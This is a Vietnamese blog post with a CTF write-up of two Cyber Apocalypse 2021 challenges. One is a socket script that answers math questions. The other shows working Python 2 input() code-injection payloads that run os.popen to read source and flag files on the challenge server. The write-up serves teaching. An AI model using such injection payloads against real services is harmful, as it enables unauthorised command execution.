<!DOCTYPE html>
<html lang="vi">
  <head>
    
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="generator" content="Hugo 0.79.1 with theme Tranquilpeak 0.4.8-BETA">
<meta name="author" content="Manh NV">
<meta name="keywords" content=", manhnv, development, cyber security, hacker, CTF, CTF writeup">
<meta name="description" content="1. Alien Camp Bài này đơn giản là cho một server với 1 port mở như vầy.
Đây là yêu cầu của đề bài
Khi connect vào server thì có các thông tin sau. Đơn giản và dễ hiểu thì là tính toán và gửi kết quả cho nó. Nó có tận 500 bài toán lận.
Bài này thiên về kiểu viết code để tính toán, logic tý là ra nên khỏi phải giải thích nhiều.">


<meta property="og:description" content="1. Alien Camp Bài này đơn giản là cho một server với 1 port mở như vầy.
Đây là yêu cầu của đề bài
Khi connect vào server thì có các thông tin sau. Đơn giản và dễ hiểu thì là tính toán và gửi kết quả cho nó. Nó có tận 500 bài toán lận.
Bài này thiên về kiểu viết code để tính toán, logic tý là ra nên khỏi phải giải thích nhiều.">
<meta property="og:type" content="article">
<meta property="og:title" content="[Cyber Apocalypse 2021]- Misc Alien Camp and Input as a Service writeup">
<meta name="twitter:title" content="[Cyber Apocalypse 2021]- Misc Alien Camp and Input as a Service writeup">
<meta property="og:url" content="https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/">
<meta property="twitter:url" content="https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/">
<meta property="og:site_name" content="Chia sẻ là niềm vui">
<meta property="og:description" content="1. Alien Camp Bài này đơn giản là cho một server với 1 port mở như vầy.
Đây là yêu cầu của đề bài
Khi connect vào server thì có các thông tin sau. Đơn giản và dễ hiểu thì là tính toán và gửi kết quả cho nó. Nó có tận 500 bài toán lận.
Bài này thiên về kiểu viết code để tính toán, logic tý là ra nên khỏi phải giải thích nhiều.">
<meta name="twitter:description" content="1. Alien Camp Bài này đơn giản là cho một server với 1 port mở như vầy.
Đây là yêu cầu của đề bài
Khi connect vào server thì có các thông tin sau. Đơn giản và dễ hiểu thì là tính toán và gửi kết quả cho nó. Nó có tận 500 bài toán lận.
Bài này thiên về kiểu viết code để tính toán, logic tý là ra nên khỏi phải giải thích nhiều.">
<meta property="og:locale" content="vi">

  
    <meta property="article:published_time" content="2021-04-25T00:00:00">
  
  
    <meta property="article:modified_time" content="2021-04-25T00:00:00">
  
  
  
    
      <meta property="article:section" content="ctf">
    
  
  
    
      <meta property="article:tag" content="ctf">
    
      <meta property="article:tag" content="Cyber Apocalypse 2021">
    
      <meta property="article:tag" content="ctf misc writeup">
    
      <meta property="article:tag" content="writeup">
    
  


<meta name="twitter:card" content="summary">







  <meta property="og:image" content="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.20.57.png">
  <meta property="twitter:image" content="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.20.57.png">





  <meta property="og:image" content="https://manhnv.com/favicon.png">
  <meta property="twitter:image" content="https://manhnv.com/favicon.png">


    <title>[Cyber Apocalypse 2021]- Misc Alien Camp and Input as a Service writeup</title>

    <link rel="icon" href="https://manhnv.com/favicon.png">
    

    

    <link rel="canonical" href="https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/">

    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css" integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin="anonymous" />
    
    
    <link rel="stylesheet" href="https://manhnv.com/css/style-twzjdbqhmnnacqs0pwwdzcdbt8yhv8giawvjqjmyfoqnvazl0dalmnhdkvp7.min.css" />
    
    
      
        <link rel="stylesheet"  href="https://manhnv.com/css/mystyle.css">
      
    

    
      
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-128983514-1', 'auto');
	
	ga('send', 'pageview');
}
</script>

    
    <meta property="fb:pages" content="447047472469512" />

<div id="fb-root"></div>
<script>
  window.fbAsyncInit = function() {
    FB.init({
      xfbml            : true,
      version          : 'v9.0'
    });
  };

  (function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = 'https://connect.facebook.net/en_US/sdk/xfbml.customerchat.js';
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

<script async defer crossorigin="anonymous" src="https://connect.facebook.net/vi_VN/sdk.js#xfbml=1&version=v10.0&appId=289802794723623&autoLogAppEvents=1" nonce="mBBqfgRB"></script>


<div class="fb-customerchat"
  attribution="setup_tool"
  page_id="447047472469512"
theme_color="#20cef5"
logged_in_greeting="Hi! How can I help you?"
logged_out_greeting="Hi! How can I help you?">
</div>
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="5">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://manhnv.com/">Chia sẻ là niềm vui</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://manhnv.com/#about">
    
    
    
      
        <img class="header-picture" src="https://manhnv.com/favicon.png" alt="Ảnh đại diện" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="5">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://manhnv.com/#about">
          <img class="sidebar-profile-picture" src="https://manhnv.com/favicon.png" alt="Ảnh đại diện" />
        </a>
        <h4 class="sidebar-profile-name">Manh NV</h4>
        
          <h5 class="sidebar-profile-bio">Chia sẻ là niềm vui</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://manhnv.com/donate.html">
    
      <i class="sidebar-button-icon fa fa-usd"></i>
      
      <span class="sidebar-button-desc">Donate</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://manhnv.com/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Trang chủ</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://manhnv.com/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Danh mục</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://manhnv.com/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Thẻ thông tin</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://manhnv.com/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">Lưu trữ</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://manhnv.com/#about">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">Thông tin</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://manhnv.com/copyrights">
    
      <i class="sidebar-button-icon fa fa-lg fa-copyright"></i>
      
      <span class="sidebar-button-desc">Copyrights</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      

    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/nguyenmanh1997" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://facebook.com/manhnv.sec" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-facebook"></i>
      
      <span class="sidebar-button-desc">Facebook</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://www.youtube.com/channel/UCEY3DBfSDupbSG96jfcSDwQ?sub_confirmation=1" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-youtube"></i>
      
      <span class="sidebar-button-desc">Youtube</span>
    </a>
  </li>


    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="5"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-left">
  
    <h1 class="post-title" itemprop="headline">
      [Cyber Apocalypse 2021]- Misc Alien Camp and Input as a Service writeup
    </h1>
  
  
  <div class="postShorten-meta post-meta">
    
      <time itemprop="datePublished" datetime="2021-04-25T00:00:00Z">
        
  tháng 4 25, 2021

      </time>
    
    
  
  
    <span>mục</span>
    
      <a class="category-link" href="https://manhnv.com/categories/ctf">ctf</a>
    
  

  </div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              <h2 id="1-alien-camp">1. Alien Camp</h2>
<p>Bài này đơn giản là cho một server với 1 port mở như vầy.</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.20.57.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.20.57.png"></p>
<p>Đây là yêu cầu của đề bài</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.08.25.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.08.25.png"></p>
<p>Khi connect vào server thì có các thông tin sau. Đơn giản và dễ hiểu thì là tính toán và gửi kết quả cho nó. Nó có tận 500 bài toán lận.</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.07.19.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.07.19.png"></p>
<p>Bài này thiên về kiểu viết code để tính toán, logic tý là ra nên khỏi phải giải thích nhiều.
Dưới đây là POC mình viết, nó nhìn thì ngu như nó work nhé các bạn :D</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-py" data-lang="py"><span style="color:#f92672">import</span> time
<span style="color:#f92672">import</span> socket
<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">return_value</span>(s, values):
    <span style="color:#66d9ef">return</span> values<span style="color:#f92672">.</span>get(s)

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">split_values_to_json</span>(values):
    values <span style="color:#f92672">=</span> values<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34; &#34;</span>)
    data <span style="color:#f92672">=</span> {}
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">0</span>,len(values), <span style="color:#ae81ff">3</span>):
        data<span style="color:#f92672">.</span>update({
            values[i]: int(values[i <span style="color:#f92672">+</span> <span style="color:#ae81ff">2</span>])
        })

    <span style="color:#66d9ef">return</span> data

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">calc</span>(array_answers):
    l <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
    <span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> array_answers:
        <span style="color:#66d9ef">if</span> c <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;-&#39;</span> <span style="color:#f92672">or</span> c <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;+&#39;</span> <span style="color:#f92672">or</span> c <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;*&#39;</span> <span style="color:#f92672">or</span> c <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;/&#39;</span>:
            l <span style="color:#f92672">=</span> l <span style="color:#f92672">+</span> c
        <span style="color:#66d9ef">else</span>:
            l <span style="color:#f92672">=</span> l <span style="color:#f92672">+</span> str(return_value(c, array_values))
    <span style="color:#66d9ef">print</span>(l)
    <span style="color:#66d9ef">return</span> eval(l)

s<span style="color:#f92672">=</span>socket<span style="color:#f92672">.</span>socket(socket<span style="color:#f92672">.</span>AF_INET, socket<span style="color:#f92672">.</span>SOCK_STREAM)
s<span style="color:#f92672">.</span>connect((<span style="color:#e6db74">&#39;138.68.177.159&#39;</span>, <span style="color:#ae81ff">30906</span>))
<span style="color:#66d9ef">print</span> (s<span style="color:#f92672">.</span>recv(<span style="color:#ae81ff">1024</span>))

s<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
values <span style="color:#f92672">=</span> s<span style="color:#f92672">.</span>recv(<span style="color:#ae81ff">1024</span>)<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#34;utf-8&#34;</span>) <span style="color:#f92672">+</span> s<span style="color:#f92672">.</span>recv(<span style="color:#ae81ff">1024</span>)<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#34;utf-8&#34;</span>)
<span style="color:#66d9ef">print</span>(values)
values <span style="color:#f92672">=</span> values<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">&#34;</span>)[<span style="color:#ae81ff">1</span>]<span style="color:#f92672">.</span>strip(<span style="color:#e6db74">&#34; &#34;</span>)
<span style="color:#66d9ef">print</span>(values<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34; &#34;</span>))
array_values <span style="color:#f92672">=</span> split_values_to_json(values)

<span style="color:#66d9ef">print</span>(array_values)
<span style="color:#75715e"># s.recv(1024).decode(&#34;utf-8&#34;)</span>
s<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;2</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)

<span style="color:#66d9ef">while</span> True:
    <span style="color:#75715e"># lay gia tri</span>
    <span style="color:#75715e"># tinh toan</span>
    answers <span style="color:#f92672">=</span> s<span style="color:#f92672">.</span>recv(<span style="color:#ae81ff">1024</span>)<span style="color:#f92672">.</span>decode(<span style="color:#e6db74">&#34;utf-8&#34;</span>)
    <span style="color:#66d9ef">if</span> answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;CHTB{&#34;</span>) <span style="color:#f92672">!=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>:
        <span style="color:#66d9ef">print</span>(answers)
        <span style="color:#66d9ef">break</span>
    <span style="color:#66d9ef">print</span>(<span style="color:#e6db74">&#34;-------{}------&#34;</span><span style="color:#f92672">.</span>format(answers))

    start <span style="color:#f92672">=</span> answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;Question&#34;</span>)
    stop <span style="color:#f92672">=</span> answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;Answer:&#34;</span>)

    tmp_answers <span style="color:#f92672">=</span> answers<span style="color:#f92672">.</span>replace(<span style="color:#e6db74">&#34;Answer:&#34;</span>, <span style="color:#e6db74">&#34;&#34;</span>)

    <span style="color:#75715e"># print(&#34;--------bbbbbbb{}&#34;.format(tmp_answers))</span>
    len_question <span style="color:#f92672">=</span> tmp_answers[tmp_answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;Question&#34;</span>): tmp_answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;:&#34;</span>) <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>]

    <span style="color:#66d9ef">if</span> len_question <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;&#34;</span>:
        len_question <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>
    <span style="color:#66d9ef">else</span>:
        len_question <span style="color:#f92672">=</span> len(len_question)
    answers <span style="color:#f92672">=</span> answers[start <span style="color:#f92672">+</span> len_question: stop]<span style="color:#f92672">.</span>strip(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">&#34;</span>)
    _answers <span style="color:#f92672">=</span> answers[:answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34; =&#34;</span>)]

    <span style="color:#66d9ef">if</span> _answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;Question&#34;</span>) <span style="color:#f92672">!=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>:
        _len <span style="color:#f92672">=</span> len(_answers[_answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;Question&#34;</span>): _answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;:&#34;</span>) <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>])
        _answers <span style="color:#f92672">=</span> _answers[_answers<span style="color:#f92672">.</span>find(<span style="color:#e6db74">&#34;Question&#34;</span>) <span style="color:#f92672">+</span> _len:]<span style="color:#f92672">.</span>strip(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n\n</span><span style="color:#e6db74">&#34;</span>)

    array_answers <span style="color:#f92672">=</span> _answers<span style="color:#f92672">.</span>strip(<span style="color:#e6db74">&#34; &#34;</span>)<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34; &#34;</span>)

    results <span style="color:#f92672">=</span> calc(array_answers)
    s<span style="color:#f92672">.</span>send(<span style="color:#e6db74">&#34;{}</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span><span style="color:#f92672">.</span>format(results)<span style="color:#f92672">.</span>encode())
    <span style="color:#66d9ef">print</span>(<span style="color:#e6db74">&#34;results: {}&#34;</span><span style="color:#f92672">.</span>format(results))
</code></pre></div><p>Flag là: <code>CHTB{3v3n_4l13n5_u53_3m0j15_t0_c0mmun1c4t3}</code></p>
<h2 id="2-input-as-a-service">2. Input as a Service</h2>
<p>Những gì bài cho là một ip và port.</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.19.39.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.19.39.png"></p>
<p>Thử connect vào và điền một vài thứ gì đó ngớ ngẩn, thì tôi có được thông báo lỗi như sau:</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.10.48.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.10.48.png"></p>
<p>Báo lỗi là tên không được tìm thấy, vậy là những gì tôi nhập vào được xem là 1 biến, và nó không chạy được là do không tìm thấy ư? ư? ư? Một câu hỏi lớn, và chú ý hơn nữa thì có dòng <code>text = input(' ')</code> và phiên bản python là <code>2.7.18</code></p>
<p>Hay lắm, vậy chắc chắn là những gì tôi nhập vào sẽ được đi qua hàm input, ở phiên bản python <code>2.7.18</code>. Đây là mấu chốt, ở phiên bản python này, input đã được khuyến nghị là không nên sử dụng, vì nó không an toàn, có thể sử dụng <code>code injection</code> thông của hàm này.</p>
<p>Vậy thử thôi, thực ra là thi CTF chả có thời gian mà thử nhiều, tôi thử luôn như dưới cho chắc ăn.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-py" data-lang="py">eval(compile(<span style="color:#e6db74">&#34;&#34;&#34;__import__(&#39;os&#39;).popen(r&#39;cat /app/input_as_a_service.py&#39;).read()&#34;&#34;&#34;</span>,<span style="color:#e6db74">&#39;&#39;</span>,<span style="color:#e6db74">&#39;single&#39;</span>))
</code></pre></div><p>Tôi đọc file <code>/app/input_as_a_service.py</code>, file này thấy khi server trả về lỗi, mục đích là đọc source code trong này để đảm bảo rằng suy nghĩ của tôi đúng.</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.15.25.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.15.25.png"></p>
<p>Sau khi chạy thì server đã trả về source code cho tôi như dưới.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/python2.7</span>
<span style="color:#f92672">from</span> sys <span style="color:#f92672">import</span> version

<span style="color:#e6db74">&#39;&#39;&#39;
</span><span style="color:#e6db74">Descr:
</span><span style="color:#e6db74">In order to blend with the extraterrestrials, we need to talk and sound like them. Try some phrases in order to check if you can make them believe you are one of them. 
</span><span style="color:#e6db74">&#39;&#39;&#39;</span>

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>():
    <span style="color:#66d9ef">print</span> version <span style="color:#f92672">+</span> <span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">Do you sound like an alien?</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&gt;&gt;&gt; </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>
    <span style="color:#66d9ef">for</span> _ <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">2</span>):
        text <span style="color:#f92672">=</span> input(<span style="color:#e6db74">&#39; &#39;</span>)
        <span style="color:#66d9ef">print</span> text

<span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;__main__&#34;</span>:
    main()
</code></pre></div><p>Vậy là luồng suy nghĩ của tôi ngay từ đầu đã đúng, bây giờ thì xem file flag nằm ở đâu chứ nhỉ. Có thể sử dụng bất cứ lệnh gì để tìm file <code>flag</code>. Ví dụ: <code>find / -name 'flag*'</code>, <code>ls</code> xem chúng có ở cùng folder với file chạy không.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">eval(compile(<span style="color:#e6db74">&#34;&#34;&#34;__import__(&#39;os&#39;).popen(r&#39;ls&#39;).read()&#34;&#34;&#34;</span>,<span style="color:#e6db74">&#39;&#39;</span>,<span style="color:#e6db74">&#39;single&#39;</span>))
</code></pre></div><p>Tôi <code>ls</code> thử thì đã thấy được file flag là <code>flag.txt</code>.</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.18.22.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.18.22.png"></p>
<p>Bây giờ chỉ cần đọc nó thôi là xong bài này rồi.</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">eval(compile(<span style="color:#e6db74">&#34;&#34;&#34;__import__(&#39;os&#39;).popen(r&#39;cat flag.txt&#39;).read()&#34;&#34;&#34;</span>,<span style="color:#e6db74">&#39;&#39;</span>,<span style="color:#e6db74">&#39;single&#39;</span>))
</code></pre></div><p>Đã tìm thấy được flag.</p>
<p><img src="https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.18.59.png" alt="/images/posts/ctf/Cyber-Apocalypse-2021/misc/Screen_Shot_2021-04-24_at_22.18.59.png"></p>
<p><code>Flag là: CHTB{4li3n5_us3_pyth0n2.X?!}</code></p>

              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">THẺ ĐÁNH DẤU</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://manhnv.com/tags/ctf/">ctf</a>

  <a class="tag tag--primary tag--small" href="https://manhnv.com/tags/cyber-apocalypse-2021/">Cyber Apocalypse 2021</a>

  <a class="tag tag--primary tag--small" href="https://manhnv.com/tags/ctf-misc-writeup/">ctf misc writeup</a>

  <a class="tag tag--primary tag--small" href="https://manhnv.com/tags/writeup/">writeup</a>

                  </div>
                
              
            
            <div class="post-actions-wrap">
    
        <nav >
          <ul class="post-actions post-action-nav">
            
              <li class="post-action">
                
                  <a class="post-action-btn btn btn--default tooltip--top" href="https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-build-yourself-in-writeup/" data-tooltip="[Cyber Apocalypse 2021]- Misc &#39;Build yourself in&#39; writeup">
                
                    <i class="fa fa-angle-left"></i>
                    <span class="hide-xs hide-sm text-small icon-ml">Tiếp</span>
                  </a>
              </li>
              <li class="post-action">
                
                  <a class="post-action-btn btn btn--default tooltip--top" href="https://manhnv.com/2021/04/cyber-apocalypse-2021-web-daas-writeup/" data-tooltip="[Cyber Apocalypse 2021]- Web Daas writeup">
                
                    <span class="hide-xs hide-sm text-small icon-mr">Trước</span>
                    <i class="fa fa-angle-right"></i>
                  </a>
              </li>
            
          </ul>
        </nav>
      <ul class="post-actions post-action-share" >
        
          <li class="post-action hide-lg hide-md hide-sm">
            <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
              <i class="fa fa-share-alt"></i>
            </a>
          </li>
          
            <li class="post-action hide-xs">
              <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/">
                <i class="fa fa-facebook-official"></i>
              </a>
            </li>
          
            <li class="post-action hide-xs">
              <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/">
                <i class="fa fa-twitter"></i>
              </a>
            </li>
          
        
        
        
            
            
            
        <li class="post-action">
            <a class="post-action-btn btn btn--default" href="#post-comments">
                <i class="fa fa-comment-o"></i>
            </a>
        </li>
        
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default" href="#">
          
            <i class="fa fa-list"></i>
          </a>
        </li>
      </ul>
    
  </div>
  
            <div id="post-comments">
                
                

                <div class="fb-comments" data-href="https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/" data-width="100%" data-numposts="5"></div>
                
            </div>
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2021 <a href="https://manhnv.com">Manhnv</a><a href="//www.dmca.com/Protection/Status.aspx?ID=26de1c55-21c3-4e09-9e8b-f7507ee02f5e" title="DMCA.com Protection Status" class="dmca-badge"> <img src ="https://images.dmca.com/Badges/dmca_protected_sml_120m.png?ID=26de1c55-21c3-4e09-9e8b-f7507ee02f5e"  alt="DMCA.com Protection Status" /></a>  <script src="https://images.dmca.com/Badges/DMCABadgeHelper.min.js"> </script>. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="5">
        <div class="post-actions-wrap">
    
        <nav >
          <ul class="post-actions post-action-nav">
            
              <li class="post-action">
                
                  <a class="post-action-btn btn btn--default tooltip--top" href="https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-build-yourself-in-writeup/" data-tooltip="[Cyber Apocalypse 2021]- Misc &#39;Build yourself in&#39; writeup">
                
                    <i class="fa fa-angle-left"></i>
                    <span class="hide-xs hide-sm text-small icon-ml">Tiếp</span>
                  </a>
              </li>
              <li class="post-action">
                
                  <a class="post-action-btn btn btn--default tooltip--top" href="https://manhnv.com/2021/04/cyber-apocalypse-2021-web-daas-writeup/" data-tooltip="[Cyber Apocalypse 2021]- Web Daas writeup">
                
                    <span class="hide-xs hide-sm text-small icon-mr">Trước</span>
                    <i class="fa fa-angle-right"></i>
                  </a>
              </li>
            
          </ul>
        </nav>
      <ul class="post-actions post-action-share" >
        
          <li class="post-action hide-lg hide-md hide-sm">
            <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
              <i class="fa fa-share-alt"></i>
            </a>
          </li>
          
            <li class="post-action hide-xs">
              <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/">
                <i class="fa fa-facebook-official"></i>
              </a>
            </li>
          
            <li class="post-action hide-xs">
              <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https://manhnv.com/2021/04/cyber-apocalypse-2021-misc-alien-camp-and-input-as-a-service-writeup/">
                <i class="fa fa-twitter"></i>
              </a>
            </li>
          
        
        
        
            
            
            
        <li class="post-action">
            <a class="post-action-btn btn btn--default" href="#post-comments">
                <i class="fa fa-comment-o"></i>
            </a>
        </li>
        
        <li class="post-action">
          
